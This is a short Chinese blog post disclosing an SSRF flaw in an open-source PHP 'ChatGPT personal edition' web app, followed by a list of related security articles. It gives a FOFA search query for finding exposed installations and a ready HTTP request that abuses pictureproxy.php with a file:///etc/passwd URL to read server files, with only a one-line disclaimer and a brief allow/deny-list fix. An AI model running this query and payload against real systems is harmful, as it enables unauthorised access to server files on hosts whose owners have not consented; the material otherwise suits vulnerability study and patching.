chatgpt个人版ssrf漏洞

扣脚大汉在网络2024-09-17 18:32

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码 
title="ChatGPT个人专用版"

漏洞描述

该系统是一个开源的chatgpt系统,是PHP版调用OpenAI的API接口进行问答的模型,在prictureproxy.php文件处存在ssrf漏洞

漏洞复现

payload

yaml 复制代码 
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: x.x.x.x

修复建议

修改源代码,进行黑白名单

相关推荐
网络研究院2 天前
新的 SHAMOS MacOS 窃取程序利用单行终端命令攻击用户
macos·攻击·漏洞·用户
IT 青年5 天前
CVE-2014-6271(bash破壳漏洞 )
漏洞
网络研究院6 天前
新的“MadeYouReset”方法利用 HTTP/2 进行隐秘的 DoS 攻击
网络·网络协议·安全·http·攻击·漏洞
IT 青年16 天前
CVE-2020-24557
漏洞
第十六年盛夏.18 天前
【网络安全】不安全的反序列化漏洞
网络安全·漏洞
IT 青年25 天前
CVE-2021-21148
漏洞
远方2351 个月前
Android无需授权直接访问Android/data目录漏洞
android·安全·文件·漏洞·目录·权限
浮江雾1 个月前
XXE漏洞1-XXE 漏洞简介-XML 语法-DTD 讲解-外部实体讲解
xml·安全·web安全·漏洞·xxe
IT 青年1 个月前
Windows 用户账户控制(UAC)绕过漏洞
漏洞
IT 青年1 个月前
HTTP请求走私漏洞
漏洞
热门推荐
01UV安装并设置国内源02【踩坑笔记】50系显卡适配的 PyTorch 安装03KGG转MP3工具|非KGM文件|解密音频04Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code05蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接06Claude Code VSCode集成开发指南:AI编程助手完整配置07【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)082025最新国内服务器可用docker源仓库地址大全(2025年8月更新)0920个国内外主流AI绘画工具大汇总(最新免费可用~)10DeepSeek更新!速览DeepSeek V3.1新特性